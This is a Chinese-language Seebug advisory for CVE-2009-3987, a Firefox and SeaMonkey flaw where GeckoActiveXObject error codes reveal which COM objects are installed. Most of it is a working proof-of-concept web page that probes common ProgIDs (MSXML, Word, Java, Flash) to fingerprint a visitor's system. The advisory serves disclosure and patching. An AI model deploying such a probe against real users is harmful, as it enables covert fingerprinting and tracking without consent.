Firefox GeckoActiveXObject异常消息COM对象枚举漏洞

2009-12-20T00:00:00
ID SSV:15113
Type seebug
Reporter Root
Modified 2009-12-20T00:00:00

Description

BUGTRAQ ID: 37360 CVE(CAN) ID: CVE-2009-3987

Firefox是一款流行的开源WEB浏览器。

Mozilla的GeckoActiveXObject在实例化失败时抛出的异常消息,会根据所请求的ProgID是否存在于系统注册表而不同(ProgID未注册时为 COM Error Result = 800401f3,已注册时为 80004005)。恶意站点只需在脚本中逐一尝试一组常见ProgID并比对异常文本,即可枚举出用户系统上所安装的COM对象(如MSXML、Office、Java、Flash等),并据此建立指纹以跨浏览会话追踪用户;整个过程不需要COM对象真正创建成功。

受影响版本:Mozilla Firefox 3.5.x、Mozilla Firefox 3.0.x、Mozilla SeaMonkey 2.0

厂商补丁:

Mozilla

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.mozilla.org/

                                        
                                            
                                                <?xml version="1.0"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<!--
Copyright (c) 2009, Gregory Fleischer (gfleischer@gmail.com)
License: Revised BSD
-->
<head>
<title>COM Enumeration using GeckoActiveXObject</title>
<script type="text/javascript">//<![CDATA[

// ProgIDs reported as installed by the most recent test() run.  Kept global
// on purpose: check_object() appends to it and test() resets it per run.
var matches = [];

// ProgIDs to probe.  The first entry looks like a deliberate nonsense
// sentinel: if it "matches" too, the HRESULT heuristic in check_object() is
// not discriminating on this build (test() reports that as "matched
// everything").  The rest are common MSXML / Office / QuickTime / RealPlayer
// / Java / Flash classes whose presence fingerprints the machine.
var progIDs = [
    "akadlkasdlfkj.akadlkasdlfkj",
    "MSXML2.DOMDocument","MSXML2.DOMDocument.2.0",
    "MSXML2.DOMDocument.3.0", "MSXML2.DOMDocument.4.0",
    "MSXML2.DOMDocument.5.0", "MSXML2.DOMDocument.6.0",
    "Word.Document.6", "Word.Document.8", "Word.Document.10",
    "Word.Document.12",
    "QuickTime.QuickTime", "QuickTime.QuickTime.9",
    "RealPlayer.HWEventHandler",
    "JavaPlugin", "JavaPlugin.FamilyVersionSupport",
    "JavaPlugin.160_12", "JavaPlugin.160_13",
    "JavaPlugin.160_14",
    "ShockwaveFlash.ShockwaveFlash",
    "ShockwaveFlash.ShockwaveFlash.11",
    "ShockwaveFlash.ShockwaveFlash.10",
    "ShockwaveFlash.ShockwaveFlash.9",
    "ShockwaveFlash.ShockwaveFlash.6",
];

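/**
 * Probe one ProgID through GeckoActiveXObject and record it in the global
 * `matches` array when the COM class is registered on this machine.
 *
 * The object never has to instantiate: the HRESULT embedded in the exception
 * text is the side channel.  80004005 (E_FAIL) comes back when the ProgID
 * resolves to a registered class, 800401f3 (CO_E_CLASSSTRING) when it does
 * not -- see the legend in the page body.  Any other text means the probe
 * is not usable on this build, so it is surfaced instead of being silently
 * counted as "not installed".
 *
 * @param {string} progID  COM ProgID such as "MSXML2.DOMDocument".
 * @returns {boolean} true when progID was recorded as installed.
 */
function check_object(progID) {
    var err;
    try {
        new GeckoActiveXObject(progID);
        // Construction succeeded: the class is certainly registered, so it
        // must count as a match even though no exception text is available.
        matches.push(progID);
        return true;
    } catch (e) {
        err = String(e);
    }

    if (/COM\s*Error\s*Result\s*=\s*80004005/i.test(err)) {
        matches.push(progID);
        return true;
    }
    if (!/COM\s*Error\s*Result\s*=\s*800401f3/i.test(err)) {
        alert("unexpected response: " + err);
    }
    return false;
}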

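/**
 * Run the enumeration over every entry in `progIDs` and report the outcome
 * with alert().  Results accumulate in the global `matches` array, which is
 * reset on every run so repeated clicks do not append to stale output.
 *
 * When GeckoActiveXObject is absent (non-Windows builds) only the
 * "only supported on Windows" alert is shown; the previous version then fell
 * through to a misleading "no matches detected" alert as well.
 */
function test() {
    matches = [];

    if (typeof GeckoActiveXObject === "undefined") {
        alert("GeckoActiveXObject only supported on Windows");
        return;
    }

    for (var i = 0; i < progIDs.length; ++i) {
        check_object(progIDs[i]);
    }

    if (matches.length === 0) {
        alert("no matches detected");
    } else if (matches.length === progIDs.length) {
        // Every ProgID "matching" -- including the bogus first entry -- means
        // the HRESULT heuristic is not discriminating on this build.
        alert("matched everything? that's unlikely");
    } else {
        alert("matched: " + matches.join(", "));
    }
}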

/**
 * Body onload hook.  Currently does nothing: the probe only starts from the
 * "run test" button's onclick handler.
 */
function init() {
    return;
}

//]]>
</script>
</head>
<body onload="init();">
GeckoActiveXObject exceptions (the HRESULT in the message is the side channel; the object never has to be created):
<ul>
<li>COM object not installed (ProgID not in the registry): COM Error Result = 800401f3 (CO_E_CLASSSTRING)</li>
<li>COM object installed: COM Error Result = 80004005 (E_FAIL)</li>
</ul>

<input type="button" name="run test" value="run test" onclick="test()"/>
</body>
</html>
<!-- Keep this comment at the end of the file
Local variables:
mode:xml-html
sgml-declaration:"~/lib/DTD/xhtml1/xhtml1.dcl"
sgml-default-dtd-file:"~/lib/DTD/xhtml1/xhtml1-transitional.ced"
End:
-->